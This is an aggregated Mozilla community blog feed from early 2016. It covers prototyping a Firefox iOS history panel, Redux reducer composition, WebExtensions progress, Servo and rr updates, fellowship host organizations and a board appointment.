At this point, Steph had built some stuff I could work with. By building a special branch of Firefox iOS, I now had a field in the settings app which let me define a URL which would load in one of my home panels instead of the default native views. One of the benefits of this approach is that I could update the web-app remotely and not have to rebuild/redeploy the native app with each change. And by using a tool like ngrok I could actually have that panel powered by a dev server running on my machine’s localhost.

Simulator Screen Shot Feb 3, 2016, 11.05.57 AM

Steph’s WebPanel.swift provided me with a simple API to query the native profile for data, seen here:

window.addEventListener("load", function () {
    method: "getSitesByLastVisit",
    params: {
      limit: 10000
    callback: "receivedHistory"

Here, I’m firing off a message to our mozAPI once the page has loaded, and passing it some parameters: the method I’d like to run and the limit on the number of records returned. Lastly, the name of a callback for the iOS app to pass the result of the query to.

window.receivedHistory = function(err, data) {

This is the callback in my app, which just updates the flux store with the data passed from the native code.

At this point, I had a flux-powered app that could display native browser data through react views. This was enough to get going with, and let me start to build some of the UI.

Steph had stubbed out the API for me and was passing down a JSONified collection of history visits, including the URL and title for each visit. To build the UI I had in mind, however, I needed the timestamps and icons, too. Thankfully, I contributed a few hundred lines of Swift to Firefox 1.0, and could hack these in:

extension Site: DictionaryView {
    func toDictionary() -> [String: AnyObject] {
        let iconURL = icon?.url != nil ? icon?.url : ""
        return [
            "title": title,
            "url": url,
            "date": NSNumber(unsignedLongLong: (latestVisit?.date)!),
            "iconURL": iconURL!,

Which gave me the following JSON passed to the web view:

    title: “We’re building a better internet — Mozilla”,
    url: “”,
    date: “1454514630131”,
    iconUrl: “/media/img/favicon.52506929be4c.ico”

Firstly, try not to judge my Swift skills. The purpose here was to get it working as quickly as possible, not to ship this code. Hacks are allowed, and encouraged, when prototyping. I added a date and iconURL field to the history record object and before long, I was off to the races.

With timestamps and icons in hand, I could build the rest of the UI. A simple history view that batched visits by domain (so 14 Gmail links would collapse to 3 and “11 more…”), and a quick attempt at a time-based recommendation engine.

This algorithm may be ugly, but naively does one thing: depending on what time of day and day of the week it was, return to me some guesses of which sites I may be interested in (based on past browsing behaviour). It worked simply by following these steps:

  1. Filter my entire history to only include visits from the same day type (weekday vs. weekend)
  2. Exclude domains that are useless, like or
  3. Further filter the set of visits to only include visits +/- some buffer around the current time: the initial prototype used a buffer of +/- one hour
  4. Group the visits by their TLD + one level of path (i.e., which gave me better groups to work with
  5. Sort these groups by length, to provide an array with the most popular domain at the beginning (and limit this output to the top n domains, 10 in my case)

The output is similar to the following:

    domain: “”,
    date: “Wed Feb 03 2016 10:54:02 GMT-0500”,
    count: 3
    domain: “”,
    date: “Wed Feb 03 2016 10:54:02 GMT-0500”,
    count: 2

Awesome. Now I have a Foursquare-powered component at the top which lists nearby URLs. Below that, a component that shows me the 5 websites I visit most often around this time of day. And next, a component that shows my history in a slightly improved format, with domain-grouping and truncation of long lists of related visits. All with my actual data, ready for me to use this week and evaluate these ideas.

One problem surfaces, though. Any visits that are from another device (through Firefox Sync) have no icon attached to them (right now, we don’t sync favicons across devices), which leaves us with large series of visits with no icon. One of the hypotheses we want to confirm is that the favicon (among other visual cues) help the user parse and understand the lists of URLs we present them with.

🔑 Occasionally I’ll be faced with a problem like this: one where I know the desired outcome but have not tackled something like this before and so have low confidence in my ability to fix it quickly. I know I need some way to get icons for a set of URLs, but not how exactly that will work. At this point its crucial to remember one of the goals of a prototype: get to a testable artifact as quickly as possible. Often in this situation I’ll time box myself: if I can get something working in a few hours, great. If not, move on or just fake it (maybe having a preset group of icons I could assign at random would help address the question).

Again, I turn to my trusty toolbox, where I know the tools and how to use them. In this case that was Node and Express, and after a few hours I had an app running on Heroku with a simple API. I could POST an array of URLs to my endpoint /icons and my Node app would spin up a series of parallel tasks (using async.parallel). Each task would load the url via node’s request module, and would hand the HTML in the response over to cheerio, a server-side analog for jQuery. Using cheerio I could grab all the <meta> tags, check for a number of known values (‘icon’, ‘apple-touch-icon’, etc) and grab the URL associated with it. While I was there, I figured I might as well capture a few other tags, such as Facebooks OpenGraph og:image tag.

Once each of the parallel requests either completed or timed out, I combined all the extracted data into one JSON object and sent it back down the wire. A sample request may look like this:

POST to ‘/icons’

{ urls: [“”] }

And the response would look like this (keyed to the URL so the app which requested it could associate icons/images to the right URL… the above array could contain any number of URLs, and the blow response would just have more top-level keys):

  “”: {
    “icons”: [
        “type”: “shortcut-icon”,
        “url”: “”
      }, …
    “images”: [
        “type”: “og-image”,
        “url”: “”
      }, …

Again, maybe not the best API design, but it works and only took a few hours. I added a simple in-memory cache so that subsequent requests for icons or images for URLs we’ve already fetched are returned instantly and with no delay. The entire Express app was 164 lines of Javascript, including all requires, comments, and error handling. It’s also generic enough that I can now use it for other prototypes where metadata such as favicons or lead images are needed for any number or URLs.


So why do all this work? Easy: because we have to. Things that just look pretty have become a commodity, and beyond being nice to look at they don’t serve much purpose. As designers, product managers, engineers—anyone who makes things—we are responsible for delivering real value to our users. Features and apps they will actually use, and when they use them, they will work well. They will work as expected, and even go out of their way to provide a moment of delight from time to time. It should be clear that the people who designed this “thing” actually used it. That it went through a number of iterations to get right. That it was no accident or coincidence that what you are holding in your hands ended up they way it is. That the designers didn’t just guess at how to solve the problem, but actually tried a few things to really understand it at a fundamental level.

Designers are problem solvers, not magicians. It is relatively cheap to pivot an idea or tweak an interface in the design phase, versus learning something in development (or worse, post-launch) and having to eat the cost of redesigning and rebuilding the feature. Simple ideas often become high-value features once their utility is seen with real use. Sometimes you get 95% of the way, and see how a minor revision can really push an idea across the finish line. And, realistically, sometimes great ideas on paper utterly flop in the field. Better to crash and burn in the hands of your trusted peers than out in the market, though.

Test your ideas, test them with real content or data, and test them with real people.

Air MozillaThe Joy of Coding - Episode 43

The Joy of Coding - Episode 43 mconley livehacks on real Firefox bugs while thinking aloud.

Laura de Reynal38 hours

TrainMapIndiaFrom Bangaluru to Ahmedabad, immersed into the train ecosystem for 38hours.
Caravan 2016 India-24Caravan 2016 India-33Caravan 2016 India-37Caravan 2016 India-49Caravan 2016 India-51
Caravan 2016 India-14Caravan 2016 India-21

Caravan 2016 India-441608km 37:45 hours

Filed under: Mozilla, Photography, Research Tagged: Connected Spaces, ethnography, India, journey, mobile office, research, train

Robert O'Callahanrr 4.1.0 Released

This release mainly improves replay performance dramatically, as I documented in November. It took a while to stabilize for release, partly because we ran into a kernel bug that caused rr tests (and sometimes real rr usage) to totally lock up machines. This release contains a workaround for that kernel bug. It also contains support for the gdb find command, and fixes for a number of other bugs.

Mozilla Addons BlogWebExtensions in Firefox 46

We last updated you on our progress with WebExtensions when Firefox 45 landed in Developer Edition (Aurora), and today we have an update for Firefox 46, which landed in Developer Edition last week.

While WebExtensions will remain in an alpha state in Firefox 46, we’ve made lots of progress, with 40 bugs closed since the last update. As of this update, we are still on track for a milestone release in Firefox 48 when it hits Developer Edition. We encourage you to get involved early with WebExtensions, since this is a great time to participate in its evolution.

A focus of this release was quality. All code in WebExtensions now pass eslint, and we’ve fixed a number of issues with intermittent test failures and timeouts. We’ve also introduced new APIs in this release that include:

  • chrome.notifications.getAll
  • chrome.runtime.sendMessage
  • chrome.webRequest.onBeforeRedirect
  • chrome.tabs.move

Create customizable views

In addition to the new APIs, support was added for second-level popup views in bug 1217129, giving WebExtension add-ons the ability to create customizable views.

Check out this example from the Whimsy add-on:

Create an iFrame within a page

The ability to create an iFrame that is connected to the content script was added in bug 1214658. This allows you to create an iFrame within a rendered page, which gives WebExtension add-ons the ability to add additional information to a page, such as an in-page toolbar:


For additional information on how to use these additions to WebExtensions, (and WebExtensions in general), please check out the examples on MDN or GitHub.

Upload and sign on (AMO)

WebExtension add-ons can now be uploaded to and signed on (AMO). This means you can sign WebExtension add-ons for release. Listed WebExtension add-ons can be uploaded to AMO, reviewed, published and distributed to Firefox users just like any other add-on. The use of these add-ons on AMO is still in beta and there are areas we need to improve, so your feedback is appreciated in the forum or as bugs.

Get involved

Over the coming months we will work our way towards a beta in Firefox 47 and the first stable release in Firefox 48. If you’d like to jump in to help, or get your APIs added, please join us on our mailing list or at one of our public meetings, or check out this wiki page.

Air MozillaWebdev Extravaganza: February 2016

Webdev Extravaganza: February 2016 Once a month web developers across the Mozilla community get together (in person and virtually) to share what cool stuff we've been working on.

Henrik SkupinFirefox Desktop automation goals Q1 2016

As promised in my last blog posts I don’t want to only blog about the goals from last quarters, but also about planned work and what’s currently in progress. So this post will be the first one which will shed some light into my active work.

First lets get started with my goals for this quarter.

Execute firefox-ui-tests in TaskCluster

Now that our tests are located in mozilla-central, mozilla-aurora, and mozilla-beta we want to see them run on a check-in basis including try. Usually you will setup Buildbot jobs to get your wanted tasks running. But given that the build system will be moved to Taskcluster in the next couple of months, we decided to start directly with the new CI infrastructure.

So how will this look like and how will mozmill-ci cope with that? For the latter I can say that we don’t want to run more tests as we do right now. This is mostly due to our limited infrastructure I have to maintain myself. Having the needs to run firefox-ui-tests for each check-in on all platforms and even for try pushes, would mean that we totally exceed the machine capacity. Therefore we continue to use mozmill-ci for now to test nightly and release builds for en-US but also a couple of other locales. This might change later this year when mozmill-ci can be replaced by running all the tasks in Taskcluster.

Anyway, for now my job is to get the firefox-ui-tests running in Taskcluster once a build task has been finished. Although that this can only be done for Linux right now it shouldn’t matter that much given that nothing in our firefox-puppeteer package is platform dependent so far. Expanding testing to other platforms should be trivial later on. For now the primary goal is to see test results of our tests in Treeherder and letting developers know what needs to be changed if e.g. UI changes are causing a regression for us.

If you are interested in more details have a look at bug 1237550.

Documentation of firefox-ui-tests and mozmill-ci

We are submitting our test results to Treeherder for a while and are pretty stable. But the jobs are still listed as Tier-3 and are not taking care of by sheriffs. To reach the Tier-2 level we definitely need proper documentation for our firefox-ui-tests, and especially mozmill-ci. In case of test failures or build bustage the sheriffs have to know what’s necessary to do.

Now that the dust caused by all the refactoring and moving the firefox-ui-tests to settles a bit, we want to start to work more with contributors again. To allow an easy contribution I will create various project documentation which will show how to get started, and how to submit patches. Ultimately I want to see a quarter of contribution project for our firefox-ui-tests around mid this year. Lets see how this goes…

More details about that can be found on bug 1237552.

Christian HeilmannAll the small things at Awwwards Amsterdam

Last week, I cut my holiday in the Bahamas short to go to the Awwwards conference in Amsterdam and deliver yet another fire and brimstone talk about performance and considering people outside of our sphere of influence.

me at awwwardsPhoto by Trine Falbe

The slides are on SlideShare:

The screencast of the talk is on YouTube:

I want to thank the organisers for allowing me to vent a bit and I was surprised to get a lot of good feedback from the audience. Whilst the conference, understandably, is very focused on design and being on the bleeding edge, some of the points I made hit home with a lot of people.

Especially the mention of Project Oxford and its possible implementations in CMS got a lot of interest, and I’m planning to write a larger article for Smashing Magazine on this soon.

Air MozillaMartes mozilleros, 02 Feb 2016

Martes mozilleros Reunión bi-semanal para hablar sobre el estado de Mozilla, la comunidad y sus proyectos. Bi-weekly meeting to talk (in Spanish) about Mozilla status, community and...

Just BrowsingEncapsulation in Redux: the Right Way to Write Reusable Components

Encapsulation in Redux: the Right Way to Write Reusable Components

Encapsulation in Redux: the Right Way to Write Reusable Components

Redux is one of the most discussed JavaScript front-end technologies. It has defined few paradigms that vastly improve developer efficiency and give us a solid foundation for building apps in a simple yet robust way. No framework is perfect though, and even Redux has its drawbacks.

Redux has the special power make you feel like a super-programmer who can effortlessly write flawless code. Enjoyable though this may be, it's actually a huge issue because it blinds you with its simplicity and may therefore lead to situations where your shiny code turns into an unmaintainable mess. This is especially true for those who are starting a new project without any prior experience with Redux.

Encapsulation Matters

Global application state is arguably the biggest benefit of Redux. On the other hand, it is a bit of a mind-bender because we were always told that global stuff is evil. Not necessarily: there is nothing wrong with keeping the entire application state snapshot in one place, as long as you don't break encapsulation. Unfortunately, with Redux this is all too easy.

Just imagine a simple case where we have a team of two people: Dan and Andre. Both of them were given the very simple task to implement an independent component. Dan is supposed to create Foo, and Andre is supposed to create Bar. Both of the components are similar in that they should contain only a button which acts as a toggle for some string. (Obviously this is an artificial example provided for illustrative purposes.)

Encapsulation in Redux: the Right Way to Write Reusable Components

Since the state of each Component is distinct, and there are no dependencies between those them, we can encapsulate them simply by using combineReducers. This gives each reducer its own slice of application state, so it can only access the relevant part: fooReducer will get foo and barReducer will get bar. Andre and Dan can work independently, and they can even open-source the components because they are completely self-contained.

But one day, some evil person (from marketing, no doubt) tells Andre that he must extend the app and should embed a Qux component in his Bar. Qux is a simple counter with a button that just increments a number when clicked. So far so good: Andre just needs to embed the Qux in his Bar and provide an isolated application state slice so that Bar does not know anything about the internal implementation of Qux. This ensures that the principle of encapsulation is not violated. The application state shape could look like this:

  foo: {
    toggled: false
  bar: {
    toggled: false,
    qux: {
      counter: 0

However, there was one more requirement: Andre should also cooperate with Dan, because the counter must be incremented anytime Foo is toggled. Now it's getting more complicated, and it looks like some sort of interface will be needed.

Encapsulation in Redux: the Right Way to Write Reusable Components

Now we can see the problem with the way Redux blinds developers to potential architectural missteps. People tend to seize on the fact that Redux provides global application state. The simplest solution would therefore be to get rid of combineReducers and provide the entire application state to fooReducer, which can increment counter internally in the bar branch of the app state tree. Naturally this is totally wrong and breaks the principle encapsulation. You never want to do this because the logic hidden behind incrementing the counter may be much more complicated than it seems. As a result, this solution does not scale. Anytime you change the implementation of qux, you'll need to change the implementation of foo as well, which is a maintainability nightmare.

"But wait!" I hear you saying. The whole point of Redux is that you can handle a given action in multiple reducers, right? This suggests that we should handle the TOGGLE_FOO action in quxReducer and increment the counter there. This is a bad idea for a couple of reasons.

For starters, Qux becomes coupled with Foo because it needs to know about its internal details. More importantly, Reto Schläpfer makes a compelling case that it quickly becomes difficult to reason about code where the results of an action are spread across the codebase. It is much better to compose your reducers so that a higher-level reducer handles each action is a single place and delegates processing to one or more lower-level reducers.

Composition is the New Encapsulation

As you might have spotted, we are suggesting that in addition to composing components and composing state, we should compose reducers as well.

Concretely, this means that Andre needs to define a public interface for his Qux component: an incrementClicks function.

export const incrementClicks = quxState => ({...quxState, clicked: quxState.clicked + 1});  

This implementation is completely encapsulated and is specific to the Qux component. The function is exported because it is part of the public interface. Now we use this function to implement the reducer:

const quxReducer = (quxState = {clicked: 0}, { type }) => {  
  switch (type) {
    case 'QUX_INCREMENT':
      return incrementClicks(quxState); // The public method is called
      return quxState;

Because Bar embeds Qux's application state slice, barReducer is responsible for delegating all actions to quxReducer using straightforward function composition. The barReducer might look something like this:

const barReducer = (barState = {toggled: false}, action) => {  
  const { type } = action;

  switch (type) {
    case 'TOGGLE_BAR':
      return {...barState, toggled: !barState.toggled};
      return {
        qux: quxReducer(barState.qux, action) // Reducer composition

Now we are ready for some more advanced reducer composition, since we know that Qux should also increment when Foo is toggled. At the same time, we want Foo to be completely unaware of Qux's internals. We can define a top-level reducer that holds state for Foo and Bar and delegates the right portion of the app state to incrementClicks. Only rootReducer, which aggregates fooReducer and barReducer, will be aware of the interdependency between the two.

const rootReducer = (appState = {}, action) => {  
  const { type } = action;

  switch (type) {
    case 'TOGGLE_FOO':
      return {
        foo: fooReducer(, action),
        bar: {, qux: incrementClicks(}

      return {
        foo: fooReducer(, action),
        bar: barReducer(, action)

The default case acts exactly like combineReducers. The TOGGLE_FOO handler, on the other hand, glues the reducers together while handling the interdependency. There is still one line which is pretty ugly:

bar: {, qux: incrementClicks(}  

The problem is that this line depends on implementation details of Bar (state shape). We would rather encapsulate these details behind the public interface of the Bar reducer:

export const incrementClicksExposedByBar = barState => ({...barState, qux: incrementClicks(barState.qux)});  

And now it's just a matter of using the public interface:

    case 'TOGGLE_FOO':
      return {
        foo: fooReducer(, action),
        bar: incrementClicksExposedByBar(

I've prepared a complete working codepen so that you can try this out on your own.

Armen ZambranoEnd of MozCI QoC term

We recently completed another edition of Quarter of Contribution and I had the privilege to work with MikeLingF3real & xenny.
I want to take a moment to thank all three of you for your hard work and contributions! It was a pleasure to work together with you during this period.

Some of the highlights of this term are:

You can see all other mozci contributions in here.

One of the things I learned from this QoC term:
  • Prepare sets of issues that are related which build towards a goal or a feature.
    • The better you think it through the easier it will be for you and the contributors
    • In GitHub you can create milestones of associated issues
  • Remind them to review their own code.
    • This is something I try to do for my own patches and saves me from my own embarrassment :)
  • Put it on the contributors to test their code before requesting formal review
    • It forces them to test that it does what they expect it to do
  • Set expectations for review turn around.
    • I could not be reviewing code every day since I had my own personal deliverables. I set Monday, Wednesday and Friday as code review days.
It was a good learning experience for me and I hope it was beneficial for them as well.

Creative Commons License
This work by Zambrano Gasparnian, Armen is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported License.

Byron Joneshappy bmo push day!

the following changes have been pushed to

  • [1243246] Attachment data submitted via REST API must always be base64 encoded
  • [1213424] The Bugzilla autocomplete dropdown should expand the width to show the full text of a match
  • [1241667] Trying to report a bug traps the user in an infinite loop
  • [1188236] “Congratulations on having your first patch approved” email should be clearer about how to get the patch landed.
  • [1243051] Create one off script to output cpanfile with all modules and their current versions to be used for version pinning
  • [1244604] configure nagios alerting for the bmo/reviewboard connector
  • [1244996] add a script to manage a user’s settings

discuss these changes on

Filed under: bmo, mozilla

Hannah KaneOur Evolving Approach to the Curriculum Database

When we first envisioned the Curriculum Database, we had a variety of different focuses. The biggest one, in my mind, was helping people sort through the many different types of learning materials offered by various teams and projects at Mozilla in order to find the right content for their needs. Secondarily, we wanted to improve the creation process—make it easier to publish, remix, and localize content.

Since then, the vision has changed a bit, or rather, our approach has changed. Several of our designers (Luke, Sabrina, and Ricardo) have been conducting a small research project to find out how educators currently find learning materials. We’ve also been learning from conversations with the cross-team Curriculum working group, led by Chad Sansing. Finally, we’ve been looking at existing offerings in the world.

Content Creation

Our approach has evolved so that now we’re focusing on content creation first. Luke and Chad have been working together to improve the web literacy curriculum template.

Screen Shot 2016-02-01 at 3.28.59 PM

Luke also worked with the Science Lab team to design new templates for their learning handouts:

Screen Shot 2016-02-01 at 3.30.19 PM

Next up is working with the Mozilla Clubs team to create new templates for their onboarding and training materials. The goal with each of these projects is to provide scalable, reusable templates that, once created and refined, don’t require involvement from designers or developers to continue using as new content is created. Right now we’re using a combination of Thimble projects, markdown -> html conversion, and github pages. We’re in experimentation mode.

Editing, localization, quality control, and more

Some of the next hurdles to cross are around mechanisms for localization and allowing for community contribution. One thing I’ve heard from the Curriculum working group is that collaborative editing workflows are needed. One idea I really like came from Emma Irwin who suggested an “Ask for Help” workflow that triggers a ticket in a github repo. That repo is triaged and curated by community contributors, so this could be a useful way to solicit testing and edits on new content.

I’ve also heard a (resolvable) tension between wanting to encourage remixes, but also wanting to have clear quality control mechanisms. User ratings and comments can help with this. Emma has also suggested an Education Council that would review materials and mark those meeting certain criteria as “Mozilla Approved.”

And then what?

All of the above ideas fall under the “content creation” half of the puzzle. We’ve not forgotten about the “content discovery” half, but we’ve put creation first. Once we’ve developed and tested these new workflows for creation, collaborative editing, remixing, quality control, and localization, it will make sense to then switch our focus to content distribution and discovery.

Please do comment below if you have any questions or ideas about this approach.

Mozilla Open Policy & Advocacy BlogAnnouncing the 2016 Open Web Fellows Program Host Organizations

Last year was a big year for the open Web: net neutrality became a mainstream phrase in the United States, data retention and surveillance were hotly contested at government levels in the European Union, and India’s government suspended operations of Free Basic’s zero-rating practices despite Mark Zuckerberg’s insistence that he was working in the interest of the poor. Much of this was done in collaboration with organizations that share the mission to protect the open Web as a global public resource. It’s partnerships and knowledge sharing initiatives that support these movements.

Once such initiative is the Ford-Mozilla Open Web Fellows program, an international leadership program that brings together technology talent and civil society organizations to advance and protect the open Web. The Fellows embedded at these organizations will work on salient issues like privacy, access, and online rights. And this Fellowship program offers unique opportunities to learn, innovate, and gain credentials in a supportive environment while working to protect the open Web.

We are proud to announce our second cohort of host organizations, who are looking for 8 talented individuals to advise, build, and learn during their 10-month fellowships.

Apply now to become a Ford-Mozilla Open Web Fellow!
Deadline for applications: 11:59pm PST March 20, 2016

Centre for Intellectual Property and Information Technology Law (CIPIT)
CIPIT is an evidence-based research and trainingcenter based at Strathmore Law School in Nairobi, Kenya. Working with communities in extreme stances of censorship, their mission is to study and share knowledge on the development of cyberspace, and conduct research from a multidisciplinary approach. In 2016 CIPIT will be focusing on Internet Freedom in Eastern Africa, intellectual property in African development, and network measurements in election monitoring.

CIPIT is looking for an inquisitive, focused Fellow with tech expertise who can consult on a policy-oriented research process. This Fellow could help shape the next generation of Internet laws in Africa, and see the real-life needs of the tools and code they generate. For example, the Fellow could develop user-focused tools that help real-life events – like the Ugandan election. Learn more here.

Citizen Lab
Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs, University of Toronto that focuses on advanced research and development at the intersection of ICTs, human rights, and global security. They provide impartial,evidence-based, peer-reviewed research on information controls to help advocacy and policy engagement on an open and secure Internet, and help secure civil society organizations from targeted attacks.

Citizen Lab is looking for a Fellow who is motivated to apply their technical skills to questions concerning technology and human rights, and brings excellent communications and technical skills. The Fellow could develop new tools to measure Internet filtering and network interference, investigate malware attacks or the privacy and security of apps and social media, and empower citizens by developing platform for corporate and public transparency. Learn more here.

ColorOfChange is a leading civil rights organization that works to strengthen the voice of Black America and create positive change around political and social issues that affect the Black community. ColorOfChange supports net neutrality and the reclassification of broadband as a public utility, and works to give their members a voice — hugely consequential, as Black and brown Americans are least able to afford the paybooths and obstacles that come with a closed Internet.

ColorOfChange is looking for a Fellow who is passionate about ensuring the US national conversation around net neutrality includes arguments in favor of net neutrality from a civil rights perspective. This Fellow would have the opportunity to pioneer tools for rapid-response campaigning that could be replicated and used by millions, find a compelling approach for users to engage with data that is integrated in the presentation itself, leverage mobile (and wearables??) for activism. Learn more here.

Data & Society
Data & Society is a research institute that is committed to identifying issues at the intersection of technology and society. They focus on social, cultural, and ethical issues arising from data-centric technological development. In 2016, they will focus on identifying major emergent issues stemming from new data-driven technologies, develop tools to help people better understand issues, and build a diverse network of researchers and practitioners.

Data & Society is looking for a Fellow who is deeply versed in technical conversations, and understands that new massive technologies are creating disruption. This Fellow would work with people from other fields to raise the technical capacity of others in the network, and engage technical communities core to Data & Society’s mission. Learn more here.

Derechos Digitales
Derechos Digitales is an organization that promotes human rights in digital environments. Their work focuses on the nuanced realities of Latin American countries, and bring these perspectives to discussions around issues like cybersecurity and corporate transparency. They work to shape policy-making on issues such as mass surveillance, digital threats to activists, and legislative work on Internet governance. In 2016 they will focus on privacy, freedom of expression and access to knowledge.

Derechos Digitales is looking for a Fellow with tech expertise who is passionate about working at the intersection of human rights and tech policy in the global south. The Fellow could provide technical advise on the tools and resources needed in these contexts, and develop tech policy documents that can bridge the human rights and tech communities. Derechos Digitales is looking for a Spanish-speaking Fellow who would be comfortable supporting capacity building sessions with local civil society organizations. Learn more here.

European Digital Rights (EDRi)
EDRi is an association of 33 civil rights organizations from across Europe, and works to promote, protect and uphold civil and human rights in the digital environment in the European Union. Their four key priorities for 2016 are data protection and privacy, mass surveillance, copyright reform and net neutrality. EDRi supports Europe’s data protection reform and campaigned against EU state surveillance proposals. The current onslaught of “counter-terrorism” proposals after recent attacks sees European governments adopting new laws with little consideration of effectiveness, proportionality, or whether privacy is being sacrificed.

EDRi is looking for a Fellow who is passionate about raising awareness about EU digital rights, and can use their technical expertise to help educate the general public, tech-policy community, and policy-makers. For example, the Fellow could explain existing data collection practices and newly gained online rights to users via an app or other tool, depending on the Fellow’s talents and preferences. The Fellow could provide technical assistance to help policy-makers and regulators understand the tools used by online companies for tracking and monitoring. Learn more here.

Freedom of the Press Foundation
Freedom of the Press Foundation is a non-profit organization that supports and defends journalism dedicated to transparency and accountability. They believe one of the most critical press freedom issues of the 21st Century is digital security, and work to ensure journalists can use technology to do their jobs safely and without the constant fear of surveillance.

Freedom of the Press Foundation is looking for a Fellow with strong technical abilities and is interested in helping journalists work safely and communicate securely.  The Fellow would apply their skills to build and support tools like SecureDrop with Freedom of the Press Foundation’s talented staff of technologists and engineers that help journalists communicate securely with sources and whistleblowers. Learn more here.

Privacy International
Privacy International focuses on privacy issues around the world. They advocate for strong privacy protection laws, investigate government surveillance, conduct research to enact policy change, and raise awareness amongst the public about technologies that place privacy at risk. In 2016 Privacy International is working partnering with organizations in the global south to identify privacy challenges, and more work on data exploitation.

Privacy International is looking for a Fellow who’s eager to learn and find new challenges. The Fellow would use their strong technical skills to translate technology to policy-makers, and help others around the world do the same. The Fellow would work with Privacy International’s Tech Team to analyze surveillance documentation and data, identify and analyze new technologies, and help develop briefings and educational programming with a technical understanding. Learn more here.

Apply now to become a Ford-Mozilla Open Web Fellow!
Deadline for applications: 11:59pm PST March 20, 2016

John O'Duinn“Distributed” ER#5 now available!

“Distributed” Early Release #5 is now publicly available, just Book Cover for Distributed23 days after ER#4 came out.

Early Release #5 (ER#5) contains everything in ER#4 plus:
* Ch.12 group chat etiquette
* In Ch.2, the section on diversity was rewritten and enhanced by consolidating a few different passages that had been scattered across different chapters.
* Many tweaks/fixes to pre-existing Chapters.

You can buy ER#5 by clicking here, or clicking on the thumbnail of the book cover. Anyone who already has ER#1, ER#2, ER#3 or ER#4 should get prompted with a free update to ER#5 – if you don’t please let me know! And yes, you’ll get updated when ER#6 comes out later this month.

Thanks again to everyone for their ongoing encouragement, proof-reading help and feedback so far. I track all of them and review/edit/merge as fast as I can. To make sure that any feedback doesn’t get lost or caught in spam filters, please email comments to feedback at oduinn dot com.

Now time to brew more coffee and get back to typing!

ps: For the curious, here is the current list of chapters and their status:

Chapter 1: Remoties trend – AVAILABLE
Chapter 2: The real cost of an office – AVAILABLE
Chapter 3: Disaster Planning – AVAILABLE
Chapter 4: Mindset – AVAILABLE
Chapter 5: Physical Setup – AVAILABLE
Chapter 6: Video Etiquette – AVAILABLE
Chapter 7: Own your calendar – AVAILABLE
Chapter 8: Meetings – AVAILABLE
Chapter 9: Meeting Moderator – AVAILABLE
Chapter 10: Single Source of Truth
Chapter 11: Email Etiquette – AVAILABLE
Chapter 12: Group Chat Etiquette – AVAILABLE
Chapter 13: Culture, Trust and Conflict
Chapter 14: One-on-Ones and Reviews – AVAILABLE
Chapter 15: Joining and Leaving
Chapter 16: Bring Humans Together – AVAILABLE
Chapter 17: Career path – AVAILABLE
Chapter 18: Feed your soul – AVAILABLE
Chapter 19: Final Chapter


Mozilla Addons BlogFirefox Accounts on AMO

In order to provide a more consistent experience across all Mozilla products and services, (AMO) will soon begin using Firefox Accounts.

During the first stage of the migration, which will begin in a few weeks, you can continue logging in with your current credentials and use the site as you normally would. Once you’re logged in, you will be asked to log in with a Firefox Account to complete the migration. If you don’t have a Firefox Account, you can easily create one during this process.

Once you are done with the migration, everything associated with your AMO account, such as add-ons you’ve authored or comments you’ve written, will continue to be linked to your account.

A few weeks after that, when enough people have migrated to Firefox Accounts, old AMO logins will be disabled. This means when you log in with your old AMO credentials, you won’t be able to use the site until you follow the prompt to log in with or create a Firefox Account.

For more information, please take a look at the Frequently Asked Questions below, or head over to the forums. We’re here to help, and we apologize for any inconvenience.

Frequently asked questions

What happens to my add-ons when I convert to a new Firefox Account?

All the add-ons are accessible to the new Firefox Account.

Why do I want a Firefox Account?

Firefox Accounts is the identity system that is used to synchronize Firefox across multiple devices. Many Firefox products and services will soon begin migrating over, simplifying your sign-in process and making it easier for you to manage all your accounts.

Where do I change my password?

Once you have a Firefox Account, you can go to, sign in, and click on Password.

If you have forgotten your current password:

  1. Go to the AMO login page
  2. Click on I forgot my password
  3. Proceed to reset the password

The Servo BlogThis Week In Servo 49

In the last week, we landed 87 PRs in the Servo organization’s repositories.

Mátyás Mustoha has been doing awesome work bringing fixes and stability to our cross-compilation to both AArch64 and ARM 32-bit. He has a nightly build that runs here, which we hope to integrate into our own CI systems. Thanks for your great work improving the experience targeting those platforms!

Notable Additions

  • pcwalton removed some potential deadlock situations in ipc-channel
  • ms2ger moved gaol (our sandboxing library) to the Servo organization and enabled CI support for it
  • manish upgraded homu to pick up a bunch of new updates, including UI cleanups!
  • nox upgraded our Rust build to January 31st
  • mmatyas added AArch64 support to gaol, and generally cleaned it up in other repos, too
  • larsberg added some instructions on how to build and run Servo on Windows
  • simon landed CSS Multicolumn support with block fragmentation

New Contributors


No screenshot this week.


We had a meeting on changing our weekly meeting time, our build time trend, potential student projects, and the Windows support.

Mitchell BakerDr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors

As we just posted on the Mozilla Blog, today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice. Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our […]

The Mozilla BlogDr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors

Image from Twitter @klakhani

Image from Twitter @klakhani

Today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice.

Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our Board of Directors to reflect a broader range of perspectives on people, products, technology and diversity. That diversity encompasses many factors: from geography to gender identity and expression, cultural to ethnic identity, expertise to education.

Born in Pakistan and raised in Canada, Karim received his Ph.D. in Management from Massachusetts Institute of Technology (MIT) and is Associate Professor of Business Administration at the Harvard Business School, where he also serves as Principal Investigator for the Crowd Innovation Lab and NASA Tournament Lab at the Harvard University Institute for Quantitative Social Science.

Karim’s research focuses on open source communities and distributed models of innovation. Over the years I have regularly reached out to Karim for advice on topics related to open source and community based processes. I’ve always found the combination of his deep understanding of Mozilla’s mission and his research-based expertise to be extremely helpful. As an educator and expert in his field, he has developed frameworks of analysis around open source communities and leaderless management systems. He has many workshops, cases, presentations, and journal articles to his credit. He co-edited a book of essays about open source software titled Perspectives on Free and Open Source Software, and he recently co-edited the upcoming book Revolutionizing Innovation: Users, Communities and Openness, both from MIT Press.

However, what is most interesting to me is the “hands-on” nature of Karim’s research into community development and activities. He has been a supporter and ready advisor to me and Mozilla for a decade.

